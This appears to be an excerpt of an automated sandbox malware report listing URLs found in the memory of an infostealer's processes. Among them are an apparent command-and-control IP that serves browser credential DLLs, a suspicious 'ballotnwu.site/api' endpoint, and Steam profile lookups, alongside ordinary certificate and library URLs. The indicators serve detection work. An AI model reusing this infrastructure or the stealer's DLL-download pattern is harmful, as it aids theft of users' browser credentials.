Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, file.exe, KECGDBFCBK.exe.3.dr, softokn3.dll.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr, nss3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: JKEHIIJJEC.exe, 00000010.00000002.2516137174.0000000004B70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: JKEHIIJJEC.exe, 00000010.00000002.2516137174.0000000004B70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RDPWInst.exe, 00000017.00000000.2112865515.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr	String found in binary or memory: http://stascorp.com/load/1-1-0-62
Source: JKEHIIJJEC.exe, 00000010.00000002.2514195438.000000000254A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr, rdpwrap.dll.23.dr	String found in binary or memory: http://stascorp.comDVarFileInfo$
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: RDPWInst.exe, 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr	String found in binary or memory: http://www.apache.org/licenses/
Source: RDPWInst.exe, 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.16.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: RegAsm.exe, 00000003.00000002.2223847487.000000003E53F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2207871234.0000000032659000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2177878116.0000000020801000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, file.exe, KECGDBFCBK.exe.3.dr, softokn3.dll.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr, nss3.dll.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, KECGDBFCBK.exe.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, EBAAFCAFCB.exe.3.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2188004628.0000000026773000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.2143411229.000000001A1F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2174992173.000000002019D000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000563000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000051F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162
Source: RegAsm.exe, 0000000F.00000002.2525117231.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162.exe
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/
Source: RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/&
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/JDBFI
Source: RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/freebl3.dll
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/gz
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/j9
Source: RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/msvcp140.dllg
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/nss3.dll
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/nss3.dllA
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/ramData
Source: RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/softokn3.dll
Source: RegAsm.exe, 0000000F.00000002.2525117231.000000000055E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dll
Source: RegAsm.exe, 00000003.00000002.2126523047.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dllw
Source: RegAsm.exe, 00000003.00000002.2126523047.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dll~
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/vcruntime140.dll
Source: RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.1620.5938.132
Source: RegAsm.exe, 0000000F.00000002.2525117231.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162DAAAA
Source: RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162DHIEC
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162HDGCB
Source: RegAsm.exe, 0000000F.00000002.2525117231.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162ta
Source: JJJJKE.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2177981551.00000000013B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/U
Source: RegAsm.exe, 0000000C.00000002.2189236179.0000000001445000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2177981551.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/api
Source: RegAsm.exe, 0000000C.00000002.2189236179.0000000001445000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/api8D
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site:443/apiprofiles/76561199724331900h
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, BAECFH.3.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: RegAsm.exe, 00000003.00000002.2126523047.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.00000000011B7000.00000004.00000020.00020000.00000000.sdmp, BAECFH.3.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.c
Source: JJJJKE.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: JJJJKE.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: JJJJKE.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: RegAsm.exe, 0000000C.00000002.2177981551.00000000013DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: RegAsm.exe, 0000000F.00000002.2525117231.000000000051F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000051F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000051F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000051F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2189236179.000000000144F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000051F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2525117231.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2527238904.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
